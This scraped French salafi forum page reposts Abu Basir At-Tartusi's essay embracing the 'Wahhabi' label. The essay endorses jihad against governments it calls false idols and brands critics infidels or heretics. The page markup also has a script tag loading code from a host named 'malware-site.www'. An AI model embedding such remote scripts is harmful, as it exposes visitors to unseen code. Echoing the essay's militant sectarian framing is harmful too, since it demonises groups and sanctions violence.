ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Février 2018

LunMarMerJeuVenSamDim
   1234
567891011
12131415161718
19202122232425
262728    

Calendrier Calendrier


    Oui, je suis un WAHHABI ! Par Shaykh Abu Basir At-Tartusi

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    Oui, je suis un WAHHABI ! Par Shaykh Abu Basir At-Tartusi

    Message par assalafia le Dim 28 Aoû - 19:30

    Malgré mon opposition aux nouvelles appellations qui séparent les Musulmans et qui ne les unissent pas... Je dois annoncer ouvertement et clairement – sans qu’il n’y ait de parti pris: Que je suis un Wahhabite parmi ceux qui aiment Shaykh Muhammad ibn ‘Abdil-Wahhāb (qu’Allāh lui fasse miséricorde) et sa Da’wah.

    Si le Wahhabisme signifie la Da’wah (prêche) au Tawhīd (Pure Monothéisme)… et à la correcte ‘Aqīdah (croyance)… ainsi qu’à l’abandon du Shirk et la Barā’ah (désaveu) de lui et de ses gens… comme était la Da’wah du Shaykh… Alors, oui! Je suis un Wahhabite!

    Si le Wahhabisme signifie la Da’wah au Qur’ān et à la Sunnah… se tenir sur les fondements, la guidance et la compréhension des As-Salaf As-Sālih (les Pieux Prédécesseurs)… ainsi que le renoncement à tout fanatisme pour un Math’hab… comme était la Da’wah du Shaykh… Alors, oui! Je suis un Wahhabite!

    Si le Wahhabisme signifie accomplir le Jihād (Guerre Sainte) contre les Tawāghīt (faux gouvernements qui se prennent pour des divinités) oppresseurs… et accomplir le Jihād contre le Shirk et les païens… comme était la Da’wah du Shaykh… Alors, oui! Je suis un Wahhabite!

    Si le Wahhabisme signifie le juste milieu... sans penchant pour l’extrémisme ni déficience… comme était la Da’wah du Shaykh… Alors, oui! Je suis un Wahhabite!

    Certes j’ai médité sur la situation de ceux qui attaquent le Shaykh et sa Da’wah, et j’ai vu qu’ils étaient:

    - Soit des Kuffār (infidèles, mécréants)

    - Ou des Shī’ī, Rāfidhī

    - Ou des Sūfī extrémismes

    - Ou bien des hérétiques égarés

    - Ou encore des jāhil (ignorants) qui répètent ce qu’ils entendent sans connaître quoi que ce soit du Shaykh et de sa Da’wah.

    Et ceci est vraiment quelque chose de dérisoire... celui qui se satisfait en se tenant (contre la Da’wah du Tawhīd), ou qui fait partie de ces gens… ou même simplement qui augmente leur nombre par quoi que ce soit, est une personne détruite!

    Pourquoi attaquent-ils le Shaykh... et en vérité combien sont ces attaquants à cette époque... Nous avons entendu parler il y a un moment maintenant de ce genre de personnes qui étaient justes mentionnées… calomniant, scandalisant et insultant le Shaykh et sa Da’wah… jusqu’au point où, les termes, « Wahhabite » et « Wahhabisme » sont devenus des mots maudits et des insultes employés par de nombreuses personnes! Sans même qu’elles n’apportent une seule, petite preuve authentique qui justifierait toutes ces oppressions, ces insultes, ces malédictions… et cette haine?!

    Ici se trouve les paroles du Shaykh et ses écrits entre nos mains, en face de nous… facile d’accès pour quiconque les veut… tous parlent de la vérité, des prêches à la vérité, et tous ordonnent la vérité… Apportez nous une erreur qui contredise le Qur’ān ou la Sunnah qui viennent directement du Shaykh et de sa Da’wah – et qui justifierait toute cette haine, cet abus, et ce scandale… Si vous êtes véridiques!

    Mais si vous ne pouvez rien trouver – et vous ne pourrez rien trouver – alors nous saurons que la raison pour laquelle vous abusé du Shaykh et de sa Da’wah, est due au fait qu’il était sur la vérité, ce qui ne vous plait pas ni ne plait à vos Tawāghīt et vos Shayātīn!

    Et si l’on dit: « Regardez l’oppression et les erreurs de ceux qui s’attribuent au Shaykh et sa Da’wah de nos jours! »

    Je dis: ceux qui à cette époque donne un mauvais nom au Shaykh et à sa Da’wah ne nuisent pas au Shaykh et sa Da’wah… car ils ne font du tort qu’à eux-mêmes, et non aux autres. Il n’est pas permis à un homme d’être tenu responsable pour les crimes des autres… et si cela était permis… alors qui dans le monde, aujourd’hui serait préservé d’être tenu responsable et d’être puni?!


    Traduction: Ansar al Haqq
    Source: http://tibyan.wordpress.com

      La date/heure actuelle est Mar 20 Fév - 16:10